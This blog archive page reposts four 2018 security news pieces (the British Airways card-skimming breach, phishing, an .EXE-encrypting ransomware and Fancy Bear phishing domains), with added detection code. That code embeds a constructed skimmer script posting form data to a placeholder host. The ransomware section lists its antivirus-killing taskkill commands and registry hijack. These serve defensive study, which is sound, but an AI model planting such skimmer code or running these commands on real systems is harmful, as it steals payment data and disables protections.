Month: September 2018

HOW HACKERS SLIPPED BY BRITISH AIRWAYS’ DEFENSES


On Friday, British Airways disclosed a data breach impacting customer information from roughly 380,000 booking transactions made between August 21 and September 5 of this year. The company said that names, addresses, email addresses, and sensitive payment card details were all compromised. Now, researchers from the threat detection firm RiskIQ have shed new light on how the attackers pulled off the heist.

RiskIQ published details tracking the British Airways hackers’ strategy on Tuesday, also linking the intrusion to a criminal hacking gang that has been active since 2015. The group, which RiskIQ calls Magecart, is known for web-based credit card skimming—finding websites that don’t secure payment data entry forms, and vacuuming up everything that gets submitted. But while Magecart has previously been known to use the same broadly targeted code to scoop up data from various third-party processors, RiskIQ found that the attack on British Airways was much more tailored to the company’s specific infrastructure.

“We’ve been tracking the Magecart actors for a long time and one of the developments in 2017 was … they started to invest time into targets to find ways to breach specific high-profile companies, like Ticketmaster,” says RiskIQ threat researcher Yonathan Klijnsma. “The British Airways attack we see as an extension of this campaign where they’ve set up specialized infrastructure mimicking the victim site.”

In its initial disclosure, British Airways said that the breach didn’t impact passport numbers or other travel data. But the company later clarified that the compromised data included payment card expiration dates and Card Verification Value (CVV) codes, the extra three- or four-digit numbers that authenticate a card, even though British Airways has said it does not store CVVs. British Airways further noted that the breach only impacted customers who completed transactions during a specific timeframe: 22:58 BST on August 21 through 21:45 BST on September 5.

These details served as clues, leading analysts at RiskIQ and elsewhere to suspect that the British Airways hackers had injected their own JavaScript into the payment page, an attack loosely described as “cross-site scripting”: bad actors identify a poorly secured web page component and insert their own code into it to alter a victim site’s behavior. Strictly, what RiskIQ went on to find is a modification of a script British Airways itself served, but the consequence is the same: attacker-controlled code runs in the customer’s browser. That explains how the hackers accessed only information submitted during a very specific timeframe (the window in which the modified script was live) and captured data such as the CVV that British Airways itself never stores, without necessarily penetrating the company’s back-end network or servers.

Klijnsma, who pinned the recent Ticketmaster breach on Magecart and saw similarities with the British Airways situation, started looking through RiskIQ’s catalog of public web data; the company crawls more than two billion pages per day. He identified all the unique scripts on the British Airways website, the components such an injection would modify, and then tracked them through time until he found one JavaScript component that had been modified right around the time the airline said the attack began.


The script is connected to the British Airways baggage claim information page; the last time it had been modified prior to the breach was December 2012. Klijnsma quickly noticed that attackers had revised the component, adding just 22 lines of code of the kind used for clandestine data theft. The malicious code grabbed data that customers entered into a payment form and sent it to an attacker-controlled server when a user clicked or tapped the submission button. The attackers even paid to set up a TLS certificate (still commonly called an SSL certificate) for that server. There is a practical reason: a payment page is served over HTTPS, and browsers block a script on such a page from sending data to a plain-HTTP endpoint, so an HTTPS endpoint with a valid certificate lets the exfiltration request look like any other encrypted call. Attackers of all sorts have increasingly used these certificates to create an air of legitimacy, even though an encrypted connection says nothing about who is on the other end.

The airline also said in its disclosure that the attack impacted its mobile users. Klijnsma found a part of the British Airways Android app built on the same code as the compromised portion of the airline’s website. It’s normal for an app’s functionality to be based in part on existing web infrastructure, but the practice can also create shared risk. In the case of the British Airways Android app, the malicious JavaScript component the attackers injected on the main site hit the mobile app as well. Attackers seem to have designed the script with this in mind by listening for touchscreen events as well as mouse clicks.

While the attack wasn’t elaborate, it was effective, because it was tailored to the specific scripting and data flow weaknesses of the British Airways site.
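Three checks a site owner can run against their own first-party JavaScript to catch the pattern described above: a script that changed without a deployment, that hooks the submit button for both mouse and touch, and that posts form data off-site, plus a Content-Security-Policy evaluation showing whether such a post would even be permitted. This is an added illustration written for this page, not RiskIQ’s tooling and not code from the British Airways site; the script bodies, paths and hostnames are constructed, and the attacker domain is a placeholder.

```python
"""Added example: integrity, indicator and CSP checks for first-party scripts.
Not RiskIQ's tooling or British Airways code; all data below is constructed."""
import base64
import hashlib
import re
from urllib.parse import urlsplit


def sri_hash(body: str) -> str:
    """Subresource Integrity value (sha256, base64) for a script body."""
    digest = hashlib.sha256(body.encode()).digest()
    return "sha256-" + base64.b64encode(digest).decode()


# Deploy-time baseline (constructed): the clean, years-old widget, hashed.
CLEAN_WIDGET = "window.widget = { init: function () {} };\n"
BASELINE = {"/js/legacy-widget.js": sri_hash(CLEAN_WIDGET)}

# What the site serves now (constructed): the clean file plus a skimmer tail
# of the shape described above; the destination host is a placeholder.
SKIMMED_WIDGET = CLEAN_WIDGET + (
    "(function () {\n"
    "  function grab() {\n"
    "    var d = {}, f = document.forms[0];\n"
    "    for (var i = 0; i < f.elements.length; i++) d[f.elements[i].name] = f.elements[i].value;\n"
    "    var x = new XMLHttpRequest();\n"
    "    x.open('POST', 'https://example-lookalike.test/gateway/app/dataserver', true);\n"
    "    x.send(JSON.stringify(d));\n"
    "  }\n"
    "  var b = document.getElementById('submitButton');\n"
    "  b.addEventListener('mouseup', grab);\n"
    "  b.addEventListener('touchend', grab);\n"  # touch hook: fires in an app webview too
    "})();\n"
)
SERVED = {"/js/legacy-widget.js": SKIMMED_WIDGET}


def changed_scripts(baseline: dict, served: dict) -> list:
    """Paths whose served body no longer matches its deploy-time hash."""
    return sorted(p for p, body in served.items() if baseline.get(p) != sri_hash(body))


URL_RE = re.compile(r"""['"](https?://[^'"\s]+)['"]""")
HOOK_RE = re.compile(r"""addEventListener\(\s*['"](mouseup|touchend|submit|click)['"]""")
SEND_RE = re.compile(r"\b(XMLHttpRequest|fetch|sendBeacon)\b")


def exfil_indicators(body: str, first_party_hosts: set) -> dict:
    """Off-site URL + submit/touch hook + a network send is the skimmer signature."""
    offsite = sorted({u for u in URL_RE.findall(body)
                      if urlsplit(u).hostname not in first_party_hosts})
    hooks = sorted(set(HOOK_RE.findall(body)))
    sends = SEND_RE.search(body) is not None
    return {"offsite_urls": offsite, "hooks": hooks, "sends": sends,
            "suspicious": bool(offsite) and bool(hooks) and sends}


def csp_connect_allows(policy: str, url: str, page_origin: str) -> bool:
    """Would this Content-Security-Policy let page scripts connect to url?
    Covers 'self', 'none', '*', host sources and *.wildcards, which is what a
    connect-src allowlist for a payment page needs (nonces and hashes do not
    apply to connect-src)."""
    directives = {}
    for d in policy.split(";"):
        parts = d.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    sources = directives.get("connect-src") or directives.get("default-src") or ["*"]
    host = (urlsplit(url).hostname or "").lower()
    page_host = (urlsplit(page_origin).hostname or "").lower()
    for src in sources:
        if src == "'none'":
            return False
        if src == "*":
            return True
        if src == "'self'":
            if host == page_host:
                return True
            continue
        src_host = src.lower().split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
        if src_host == host or (src_host.startswith("*.") and host.endswith(src_host[1:])):
            return True
    return False


if __name__ == "__main__":
    print("changed since deploy:", changed_scripts(BASELINE, SERVED))
    print(exfil_indicators(SKIMMED_WIDGET, {"www.example.test"}))
    policy = "default-src 'self'; connect-src 'self' https://api.example.test"
    print("skimmer POST allowed by CSP:",
          csp_connect_allows(policy, "https://example-lookalike.test/gateway/app/dataserver",
                             "https://www.example.test"))
```

The hash check is the same comparison a browser performs when a script tag carries an integrity attribute, so the baseline doubles as the SRI values to publish; the CSP check shows that a connect-src allowlist would have stopped the exfiltration request regardless of how the script was modified, which is the control to reach for when you cannot guarantee no first-party script ever changes underneath you.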

British Airways said in a statement to WIRED on Tuesday, “As this is a criminal investigation, we are unable to comment on speculation.” RiskIQ says it gave the findings to the UK’s National Crime Agency and National Cyber Security Centre, which are investigating the breach with British Airways. “We are working with partners to better understand this incident and how it has affected customers,” an NCSC spokesperson said of the breach on Friday.

RiskIQ says it is attributing the incident to Magecart because the skimmer code injected into the British Airways website is a modified version of the group’s hallmark script. RiskIQ also views the attack as an evolution of the techniques used in the recent Ticketmaster breach, which RiskIQ linked to Magecart, though with the added innovation of directly targeting a victim’s site rather than compromising a third party. And some of the attack infrastructure, like the web server hosting and domain name, point to the group as well.

So far British Airways and law enforcement haven’t publicly commented on this attribution, but Klijnsma says the other takeaway for now is the prevalence of tiny website vulnerabilities that can quickly turn into huge exposures.

“It comes down to knowing your web-facing assets,” Klijnsma says. “Don’t overexpose—only expose what you need. The consequences, as seen in this incident, can be really, really bad.”

Your Business Should Be More Afraid of Phishing than Malware


Originally Seen: Security Boulevard on September 19, 2018 by Graham Cluley

The headlines love to talk about sophisticated hacking gangs, exploiting zero-day vulnerabilities to break their way into businesses and steal corporate data.

It seems not a day goes past without a security firm warning about a new strain of ransomware, or how criminals are planting cryptomining code on poorly-protected IoT devices and insecure data centres.

And although these are real problems and shouldn’t be ignored, I would argue that there is another more down-to-earth threat that is more commonly encountered and has the potential to cause massive harm to your organisation.

If you were to make a list of the most common causes of security breaches, it is phishing attacks that would surely dominate.

A recent study of 100 UK-based CISOs confirms that phishing is a major concern, with nearly half of respondents blaming the phenomenon for the biggest security incidents they had suffered in the last 12 months.

The figures speak for themselves:

  • More than twice as many breaches were blamed on phishing rather than malware (48% compared to 22%)
  • In fact, even when malware was combined with unpatched systems (41% of reports in total), it still failed to be as big a problem as phishing.

A phishing attack is considerably easier for a criminal to orchestrate than the creation of a brand new piece of malware, and can be reused time and time again with often little or no need for change between victims.

For instance, if you were an online criminal and your intention was to break into the cloud service used by a corporation in order to steal their sensitive documents, you could use the same phishing template posing as the cloud service time and time again.

[Image: aws-phishing]

Similarly, if your intention was to – say – break into an organisation’s email system and you knew that they used Office 365, you could simply construct an email that tricks the victim into clicking on a link that they believed would log them into their Office 365 account, but really was designed to steal their password.

[Image: office365-phishing-page]

Most users will find it very hard to tell the difference between a fake login page and a real one.

And if your organisation is being specifically targeted by hackers, they may have gone to additional effort to make the webpage which aims to steal your login credentials even more sophisticated.

The browser’s URL bar is perhaps where the most obvious clues of trickery can be observed, but how many users can we really expect to carefully inspect the sometimes lengthy and complex URL?

It’s only human to click without thinking, to fail to spot where the URL was really pointing, to enter a password on auto-pilot without realising what you’ve just done.

I don’t believe that raising awareness amongst users of the tricks used by phishing pages, and to look for clues in the URL bar, is a waste of time – but we must recognise that if a person’s role is not security-focused, it’s unfair and unrealistic to assume that they will always have their guard up and be alert to potential threats.

A stronger defence, therefore, is to prevent as many suspicious emails as possible from entering your organisation in the first place, to visibly warn users on-screen to take additional care when an email originates from outside the business or contains keywords associated with phishing, to enable multi-factor authentication wherever possible, and to deploy an enterprise password management solution.

These last two points I believe are particularly important, as they put technology to work in helping reduce the chances of what is essentially a human problem.

More and more services now offer business users the option of enabling multi-factor authentication or two-step verification. The huge security benefit of turning on such features is that even if online criminals do manage to steal the username and password of an account, they will not be able to access it unless they also have the one-time password (OTP) used as an additional layer of authentication.

Systems like this are not completely fool-proof: a phishing page can prompt the victim for the one-time code as well and relay it to the real service within the code’s validity window, and a sophisticated and determined attacker may be prepared to go to that additional effort. Origin-bound methods such as the physical security keys discussed below resist this, because what the key signs is tied to the real site. Even so, there is no doubt that a data breach is considerably more difficult when such additional levels of authentication are in place.

Don’t take my word for it: it was revealed a couple of months ago that not one of Google’s 85,000 employees had had their accounts compromised by phishing in the last year. The reason? All staff had been required to use physical security keys to authenticate their identity, rather than relying on passwords alone.

Google is setting a good example for other businesses here, but there is little evidence that enough other computer users are following in its footsteps.

Earlier this year, despite the alarming rise in business email compromise and phishing attacks against organisations, Google reported that less than 10% of its users had enabled two-step verification to harden their accounts against compromise.

Password managers also bring a big benefit in the fight against phishing.  That’s because, aside from their well-understood talent for storing strong passwords securely, password managers can also offer to enter a username and password when they recognise a login page.

In other words, if they *don’t* recognise a login page – perhaps because the potential victim’s browser has ended up on a bogus webpage with a lookalike but non-identical URL – the password manager will not offer to enter their credentials.
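The three defences above (one-time codes, security keys, and a password manager that refuses to fill on an unrecognised page) all turn on the same question: which origin is the user actually on? The following is an added example written for this page, not Graham Cluley’s code, that models each of them. The password-manager rule is an exact origin comparison; the one-time code is real RFC 6238 TOTP, and the “phishing proxy” simply forwards what the victim typed; the security-key assertion is modelled with an HMAC over a key shared with the service, a stand-in for the public-key signature a real FIDO authenticator produces, with the origin included in what is signed. Sites, secrets and clock values are constructed.

```python
"""Added example (not from the original post): origin binding in three defences.
The HMAC-based 'assertion' stands in for a FIDO public-key signature."""
import hashlib
import hmac
import struct
from urllib.parse import urlsplit


def autofill_origin(url: str) -> tuple:
    """(scheme, host, port) as a password manager compares saved entries."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == "https" else 80)
    return (u.scheme.lower(), (u.hostname or "").lower(), port)


def manager_offers_fill(saved_url: str, current_url: str) -> bool:
    """Exact origin match only: a lookalike host or a downgrade to http gets nothing."""
    return autofill_origin(saved_url) == autofill_origin(current_url)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP with HMAC-SHA1 and the usual 30-second step."""
    mac = hmac.new(secret, struct.pack(">Q", unix_time // step), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = int.from_bytes(mac[off:off + 4], "big") & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


class OtpService:
    """Password + TOTP login: the server cannot tell where the code was typed."""

    def __init__(self, password: str, secret: bytes):
        self.password, self.secret = password, secret

    def login(self, password: str, code: str, now: int) -> bool:
        return password == self.password and hmac.compare_digest(code, totp(self.secret, now))


def relay_otp_phish(service: OtpService, typed_password: str, typed_code: str, now: int) -> bool:
    """The fake page forwards what the victim typed within the same 30-second step."""
    return service.login(typed_password, typed_code, now)


def sign_assertion(key: bytes, challenge: bytes, origin: str) -> bytes:
    """Authenticator signs the challenge together with the origin the browser saw."""
    return hmac.new(key, challenge + b"|" + origin.encode(), hashlib.sha256).digest()


class KeyService:
    """Relying party: verifies an assertion against its own origin only."""

    def __init__(self, key: bytes, origin: str):
        self.key, self.origin = key, origin

    def verify(self, challenge: bytes, sig: bytes) -> bool:
        return hmac.compare_digest(sig, sign_assertion(self.key, challenge, self.origin))


def relay_key_phish(service: KeyService, key: bytes, challenge: bytes, fake_origin: str) -> bool:
    """The victim's key signs for the page actually shown (the fake one), so the
    relayed assertion does not verify at the real origin."""
    return service.verify(challenge, sign_assertion(key, challenge, fake_origin))


if __name__ == "__main__":
    real, fake = "https://login.example.test", "https://login.example.test.evil.test"
    print("manager fills on lookalike:", manager_offers_fill(real + "/", fake + "/"))
    otp = OtpService("hunter2", b"12345678901234567890")
    print("relayed OTP accepted:", relay_otp_phish(otp, "hunter2", totp(otp.secret, 59), 59))
    ks = KeyService(b"shared-key", real)
    print("relayed key assertion accepted:", relay_key_phish(ks, b"shared-key", b"nonce", fake))
```

The TOTP routine is the standard one, so it reproduces the RFC test vector (secret `12345678901234567890`, time 59, code 287082); the point of the block is the contrast between the two relays, not the arithmetic.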

Phishing may not be the sexiest threat out there, but do not underestimate its seriousness – and the impact it could have on your organisation if not treated with respect.

Barack Obama’s Blackmail Virus Ransomware Only Encrypts .EXE Files


Originally Seen: Bleepingcomputer.com on September 2, 2018 by Lawrence Abrams

Every once in a while you come across a really strange malware and such is the case with a new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a “tip” to decrypt the files.

[Image: Barack Obama’s Everlasting Blue Blackmail Virus Ransomware]

First tweeted by MalwareHunterTeam, this ransomware has the bizarre title of “Barack Obama’s Everlasting Blue Blackmail Virus” as shown by the file properties below.

[Image: File Properties]

When executed, this ransomware will terminate various processes associated with antivirus software such as Kaspersky, McAfee, and Rising Antivirus. The commands executed to kill the processes are:

taskkill /f /im kavsvc.exe
taskkill /f /im KVXP.kxp
taskkill /f /im Rav.exe
taskkill /f /im Ravmon.exe
taskkill /f /im Mcshield.exe
taskkill /f /im VsTskMgr.exe

It will then scan the computer for .exe files and encrypt them. When encrypting files, it will target all .EXE files, even those located under the Windows folder. Other ransomware that has encrypted executables in the past typically avoided the Windows folder so as not to break the operating system itself.

[Image: Encrypted Executables]

As part of the encryption process, this ransomware also modifies the Registry keys associated with .exe files so that they use a new icon and run the virus every time someone launches an executable: the Shell\Open\Command handler is pointed at the malware, with the path of the executable the user tried to open passed to it as "%1". On a clean system the standard class for .exe files is exefile, whose shell\open\command default is "%1" %*, so any executable class whose open command launches something else is worth treating as a hijack. The modified keys are listed below.

HKLM\SOFTWARE\Classes\exe
HKLM\SOFTWARE\Classes\exe\	
HKLM\SOFTWARE\Classes\exe\EditFlags	2
HKLM\SOFTWARE\Classes\exe\DefaultIcon
HKLM\SOFTWARE\Classes\exe\DefaultIcon\	C:\Users\User\codexgigas_.exe,0
HKLM\SOFTWARE\Classes\exe\Shell
HKLM\SOFTWARE\Classes\exe\Shell\Open
HKLM\SOFTWARE\Classes\exe\Shell\Open\Command
HKLM\SOFTWARE\Classes\exe\Shell\Open\Command\	"C:\Users\User\codexgigas_.exe" "%1"
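Two triage checks for the behaviour described above, as an added example written for this page (not BleepingComputer’s code and not the malware): one flags open-command handlers that launch something other than the file itself, the other flags taskkill commands aimed at security processes. Both run on constructed data shaped like the listings on this page: REG_VALUES mirrors the reported keys as (key, value name, data) tuples, the shape a reg export or Get-ItemProperty dump parses into, with a clean exefile entry added so the check has a benign case; PROC_EVENTS is a constructed process-creation log.

```python
"""Added example (not from the original post): registry handler hijack and
AV-kill detection over constructed sample data."""
import re

# "" as the value name means the default (unnamed) value of the key.
REG_VALUES = [
    (r"HKLM\SOFTWARE\Classes\exefile\shell\open\command", "", r'"%1" %*'),   # clean handler
    (r"HKLM\SOFTWARE\Classes\exe", "", ""),
    (r"HKLM\SOFTWARE\Classes\exe", "EditFlags", "2"),
    (r"HKLM\SOFTWARE\Classes\exe\DefaultIcon", "", r"C:\Users\User\codexgigas_.exe,0"),
    (r"HKLM\SOFTWARE\Classes\exe\Shell\Open\Command", "", r'"C:\Users\User\codexgigas_.exe" "%1"'),
]

# Clean open handler for executable classes: "%1" %* (quotes optional).
EXPECTED_HANDLER = re.compile(r'^"?%1"?\s+%\*$')
LAUNCHER_RE = re.compile(r'^"([^"]+)"|^(\S+)')


def find_hijacked_handlers(values) -> list:
    """Open-command defaults that launch something other than the opened file."""
    findings = []
    for key, name, data in values:
        if name != "" or not key.lower().endswith(r"\shell\open\command"):
            continue
        if EXPECTED_HANDLER.match(data.strip()):
            continue
        m = LAUNCHER_RE.match(data.strip())
        launcher = (m.group(1) or m.group(2)) if m else data
        findings.append({"key": key, "command": data, "launcher": launcher})
    return findings


# Process names this sample force-kills (from the command list above), lower-cased.
WATCHED = {"kavsvc.exe", "kvxp.kxp", "rav.exe", "ravmon.exe", "mcshield.exe", "vstskmgr.exe"}

PROC_EVENTS = [  # constructed process-creation events: (pid, image, command line)
    (412, r"C:\Windows\System32\taskkill.exe", "taskkill /f /im kavsvc.exe"),
    (418, r"C:\Windows\System32\taskkill.exe", "taskkill /f /im Mcshield.exe"),
    (420, r"C:\Windows\System32\taskkill.exe", "taskkill /f /im notepad.exe"),
    (431, r"C:\Windows\System32\taskkill.exe", "taskkill /im Rav.exe"),
    (440, r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]


def find_av_kills(events, watched=WATCHED) -> list:
    """taskkill invocations whose /im target is a watched security process."""
    hits = []
    for pid, image, cmdline in events:
        toks = cmdline.split()
        low = [t.lower() for t in toks]
        if not low or low[0] not in ("taskkill", "taskkill.exe") or "/im" not in low:
            continue
        idx = low.index("/im") + 1
        if idx < len(toks) and toks[idx].lower() in watched:
            hits.append({"pid": pid, "target": toks[idx], "forced": "/f" in low})
    return hits


if __name__ == "__main__":
    for f in find_hijacked_handlers(REG_VALUES):
        print("hijacked handler:", f["key"], "->", f["launcher"])
    for h in find_av_kills(PROC_EVENTS):
        print("security process killed:", h)
```

The handler check deliberately keys on the command value rather than the class name, so it catches the reported Classes\exe handler and would equally catch a rewritten exefile, batfile or cmdfile handler; the kill check records whether /f was used but flags the target either way, since a non-forced kill of an antivirus service is no less suspicious.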

The message in the ransomware interface states that users should contact the attacker at 2200287831@qq.com for payment instructions.

Hello, your computer is encrypted by me! Yeah, that means your EXE file isn't open! Because I encrypted it.
So you can decrypt it, but you have to tip it. This is a big thing. You can email this email: 2200287831@qq.com gets more information.

It is unknown how this ransomware is distributed or if the developer will even provide a decryption key if paid.

Obama is not the only president to have had ransomware named after him. Prior to the 2016 United States presidential election, the Donald Trump Ransomware was released.

The Trump Ransomware was a development version that had built-in decryption.

Microsoft: Russians targeted conservative think tanks, U.S. Senate


Originally Seen: CyberScoop on August 21, 2018 by Sean Lyngaas

The Russian intelligence office that breached the Democratic National Committee in 2016 has spoofed websites associated with the U.S. Senate and conservative think tanks in a further attempt to sow discord, according to new research from Microsoft.

The tech giant last week executed a court order and shut down six internet domains set up by the Kremlin-linked hacking group known as Fancy Bear or APT 28, Microsoft President Brad Smith said.

“We have now used this approach 12 times in two years to shut down 84 fake websites associated with this group,” Smith wrote in a blog post. “We’re concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections.”

The domains were constructed to look like they belonged to the Hudson Institute and International Republican Institute, but were in fact phishing websites meant to steal credentials.

The two think tanks are conservative, yet count many critics of U.S. President Donald Trump and Russian President Vladimir Putin among their members. The International Republican Institute lists Sen. John McCain, R-Ariz, and former Republican presidential candidate Mitt Romney as board members. The Hudson Institute and International Republican Institute also have programs that promote democracy and good governance worldwide.

There is no evidence that the domains had been used to carry out successful cyberattacks, according to Microsoft. The company says it continues to work with both think tanks and the U.S. Senate to guard against any further attacks.

The attacks come as more and more instances of cyberattacks directed at the 2018 midterm elections come to light. Last month, Russian intelligence targeted Sen. Claire McCaskill, a critic of Moscow and a red-state Democrat who faces a tough reelection bid in Missouri. Additionally, a number of election websites have been hit with DDoS attempts during their primary elections.

“We are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States,” Microsoft’s blog post read. “Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.”

Smith also announced that Microsoft was providing cybersecurity protection for candidates, campaigns and political institutions that use Office 365 at no additional cost.

Greg Otto contributed to this story.